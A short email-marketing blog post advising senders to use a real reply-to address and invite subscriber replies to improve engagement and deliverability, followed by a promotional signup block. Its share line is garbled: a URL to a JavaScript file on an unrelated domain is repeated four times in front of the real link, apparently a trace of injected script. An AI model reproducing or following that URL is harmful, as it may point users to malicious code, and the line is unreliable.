Using “Reply To” to increase engagement (and deliverability)
Since the previous post on crafting a thank you page, I've had several people write us to either:
1. Let us know they DO personally respond to email messages; and
2. To ask how/why to implement this.
First things first... kudos to you guys that are actually using this strategy!
Next, let's go over some best practices on implementation.
- Be sure that you're using a reply-to address that can actually receive mail. Bonus if it's your actual sending domain as well!
NOTE: If you are sending through our network, we are happy to set up a forwarder to your primary email address.
- Be authentic and actually reply! You may wind up with a couple replies a week or several hundred depending on your list size, level of engagement, etc.
- In your marketing, look for ways to encourage the engagement. For example:
For people that attended your webinar... "Hey there... just wanted to get some quick feedback from you on the webinar. If you could let me know what your favorite tip was, that'd be great!"
For people that purchase a new product (maybe 5 days later) "Hey there... YOURNAME here! Just wanted to reach out and make sure you had a chance to start going through the materials. I know sometimes we get busy and put new programs on the shelf. I've got a few ideas to help you implement faster. Just reply and let me know where you're at so far and I'll shoot you over some thoughts"
You get the idea!
Not only will this create a better experience with your subscribers, but it will also help improve deliverability and engagement with some of the major ISPs!
For over a decade Heather Seitz used email marketing to build successful companies and had to solve the biggest barrier to consistent profitability: deliverability. Today, she is the Co-Founder and CEO of Email Delivered.
How to use "Reply To" to increase engagement (and deliverability) http://middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&www.emaildelivered.com/increase-engagement-and-deliverability. Remember to sign up for the FREE Email Delivered Pulse newsletter for articles, tips, and recommended resources for email marketers.
How to Get Your Emails to the Inbox
If you want to get more of your emails to the inbox, you need to know the secrets that the Email Service Providers AREN’T willing to tell you. For a limited time, I’m sharing some select tips that top Internet Marketers know... for FREE.
Here’s what you’ll get right now...
- The How to Guide for getting your emails back to the inbox.
- How to find (and improve) your email “reputation” (how the ISPs see you).
- 5 Email KILLERS that your email service provider is purposely hiding from you.